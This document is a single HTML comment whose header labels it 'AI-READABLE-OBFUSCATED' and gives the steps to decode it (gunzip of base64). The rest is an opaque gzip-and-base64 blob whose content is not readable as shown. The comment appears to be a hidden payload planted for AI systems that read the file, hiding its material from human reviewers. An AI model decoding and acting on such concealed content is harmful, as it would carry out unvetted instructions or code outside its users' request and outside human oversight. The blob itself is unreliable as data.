<!-- AI-READABLE-OBFUSCATED/2 | gzip+base64 | decode: gunzip(base64(payload)) | reversible
H4sIAAAAAAAC/+1aW3PiNhh9Tn6FylM7s8Eh2bY7HZaUJbDNLAmeYNLZJ0ZgAZoIyyPLIfTXV5IvJEQ2FoRbuy8MGJ3vcs5nSf7k6tXzlIAnxAJMvc+lSvm8
BJA3pC72xp9LPad19ql0VTut/nTdaTjf7SbwCQ44sHtf2jcNUDqzrLrvE2RZ1841sNs3XQcIG5bVvCuB0oRz/w/Lms1mZShHlYd0KgcGls2ojxift4WxMwEo
u9wtCTeR9VfhiKsuHvLa6Un1Ec1rXc5EaIEDBwRVLXlF/BGoi7V7SnnVin/E422GRoiJlFDXR0M8wsJ2ioOMQfnlJHFxEoGcuZ8aP0nN292vjIZ+aueFqwSH
OdEAHfTMQQsj4gYvMVUr8VrQvbSjzJiHYBOIvbejv6H527FcuOn7esA1GsGQ8AdIwiwvQIa5rzy7aBgyZJJokIHIz1T4YYi/Rd0ESQQpgrMQWa8iGVDIXH3y
deJP4EBnuR5yOqSMoSEX94Ye7dF98X4XTgfizqp7rh16Qx5CGaSJDAUN5Kvy8fdypVJIlBEkQXFVCgZXRKI4gf3qZEPXXBstaJUeW5RDG88RSHAtAFNIDDXI
Q+WLcPFb+fzTFlTIi+gIZOjdt0341w7PJ/7F9gd7YgMUIM7l3uURc7kT2oIk2iCPQIvmFGJSd12GgsBElHxcvjrYG9E/kTSwJTHygzsCVRrQxxwS0EUelxto
I2lyQPm6CK8gSMBl4XxIPTe9Ut6CUCv2XBEL+B+YLVROskek89+UuUYaz/SAfH2VF1BnCDQSZpF+JdyqZBnJFpHrjhoW4S7FrBOSEGsipYA1JpDBIVfPx2aS
tjr3XzuO07wDzl9N0Kjb3Xan8e3qIG/VFYma67/T3TsFUAR4tojQROMlaN+j5k+9rELDAEwxD+CjbroroPCBUJzNk0dj+s3IkU5H0imYYT6hIQdcb+Zg5ooH
xOaAUG8cRRoAgqALOAWB2NcTxMCIetyEOWmLr8PdiFIwgGzbXK3bv5OXgQq9YAMvx05RPuVYRagpl+qyqkEAZSt1/kF9xkIv9eZW1JYMQtnTkrZW/lFkbUof
Qx/EbVwjRiSwMCdYbMzGiNUuqlbyddOsI3BSDSk87SW/8Fp57TUznMUfl0txWguzC2az3MYxdrzXlC74n9GMPyYMLcmwcLyBykv1JwuQiOWbGN8Da00q0Y2A
A1X5H8S8RvdW+UYJx8tHBlMrFqGUfLkAZZjYUdI9Dz2L4xwsVY9ud/GYxOZGXHhin5JYie/9foaVFTPA5UHPANu90Qvdze+8ZtLxmKANz7uUja6o5uHEPIIv
lIr9jDiOUlaKVp0a3B9E2MJFlp7x7DjH6DRUpEhNUpSD+9GvNTZqmuBE9ibjW3IHlwFY2gXumM/oZMG0ZBSfnoIaT0sV3bSk4TNvvJbPZNT5K8A+6xP8rLbu
v6xTp30FNa1W7SPFIVXrmpNrl2B3qX1h7DqyYfqAHChU30/fqqgU1oQhSGrn5V+rlvqWDr/FHp6G02L1G0Pgcx6kslnJvxMzFwfPzFsvN1M4Rrrc6Kzs61aL
l/4ywCMY8GXwvjS5/G9rsi9aPx4LrTuq1jWn9VtBGAZxQhu4V3ZWPb6YxZBTDVOJeNID1ujK/H8aK/H2Qry0iFj0ztwbMXpt5+ah3u41+61Ox2neH0JZJK2d
RePYuFDM+po/qmXncjdvbee7uaweNWvU5c3VP5R97+WlMcHicMqG3marizIjraxxOO0+QbFd0Bz3t3DR8btiS8GSuU7VOMEeUgcogE8gl41l+QIEmDHxbhdy
y5u0Spvv1xi9eP9+b1qryZWqpV7Ur53+Czii4Xw/MAAA
-->
